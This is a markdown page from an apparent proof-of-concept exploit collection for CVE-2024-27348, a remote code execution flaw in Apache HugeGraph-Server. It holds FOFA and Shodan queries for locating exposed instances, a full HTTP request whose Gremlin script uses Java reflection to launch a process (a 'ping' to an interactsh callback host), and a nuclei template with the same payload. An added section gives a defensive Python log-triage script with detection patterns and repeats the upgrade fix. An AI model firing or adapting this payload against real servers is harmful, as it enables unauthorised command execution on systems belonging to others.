POC/wpoc/Apache/Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00


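## Apache HugeGraph-Server Remote Code Execution Vulnerability (CVE-2024-27348)
An RCE (remote command execution) vulnerability in Apache HugeGraph-Server. This issue affects Apache HugeGraph-Server on Java 8 and Java 11, versions from 1.0.0 before 1.3.0. Users are advised to upgrade to version 1.3.0 with Java 11 and enable the authentication system, which fixes the issue.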
## fofa
```
app="HugeGraph-Studio"
```
## poc
```
POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
```
## nuclei
```
id: CVE-2024-27348
info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache
http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
```
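
For defenders reviewing logged `POST /gremlin` request bodies, the following added example (not part of the original file or of the nuclei template) flags the constructs the request above relies on: reflective class loading, private-field access, thread manipulation and process creation inside the `gremlin` script. The record layout `(source_ip, path, body)`, the function names and the sample records are assumptions made for illustration.

```python
import json
import re

# Indicators modelled on the request shown on this page. Runtime.getRuntime is
# an added, related indicator that does not appear in that request.
INDICATORS = {
    "reflection": re.compile(
        r"Class\s*\.\s*forName|getDeclaredField|setAccessible|getMethod\s*\(|\.invoke\s*\("),
    "process_exec": re.compile(r"ProcessBuilder|Runtime\s*\.\s*getRuntime"),
    "thread_tamper": re.compile(r"Thread\s*\.\s*currentThread|java\.lang\.Thread"),
}

def inspect_gremlin_body(raw_body):
    """Return sorted indicator names found in one logged POST /gremlin body."""
    try:
        doc = json.loads(raw_body)  # decodes \uXXXX escapes before matching
    except (TypeError, ValueError):
        return ["unparseable_body"]
    if not isinstance(doc, dict) or not isinstance(doc.get("gremlin"), str):
        return ["unparseable_body"]
    script = doc["gremlin"]
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))

def triage(records):
    """records: iterable of (source_ip, path, body); returns alerts for /gremlin only."""
    alerts = []
    for src, path, body in records:
        if path.split("?", 1)[0].rstrip("/") != "/gremlin":
            continue
        hits = inspect_gremlin_body(body)
        if hits:
            alerts.append({"src": src, "indicators": hits})
    return alerts

# Constructed sample records (not real traffic); addresses are documentation ranges.
SAMPLE = [
    ("192.0.2.10", "/gremlin", '{"gremlin": "g.V().limit(10)", "language": "gremlin-groovy"}'),
    ("198.51.100.7", "/gremlin",
     '{"gremlin": "Class c = Class.forName(\\"java.lang.ProcessBuilder\\"); f.setAccessible(true);"}'),
    ("198.51.100.7", "/gremlin", '{"gremlin": "Thread t = Thread.current\\u0054hread();"}'),
    ("203.0.113.5", "/gremlin", "not json"),
    ("203.0.113.5", "/graphs", '{"gremlin": "ProcessBuilder"}'),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

This is a heuristic for log triage, not a replacement for the fix stated above (upgrade to 1.3.0 and enable authentication).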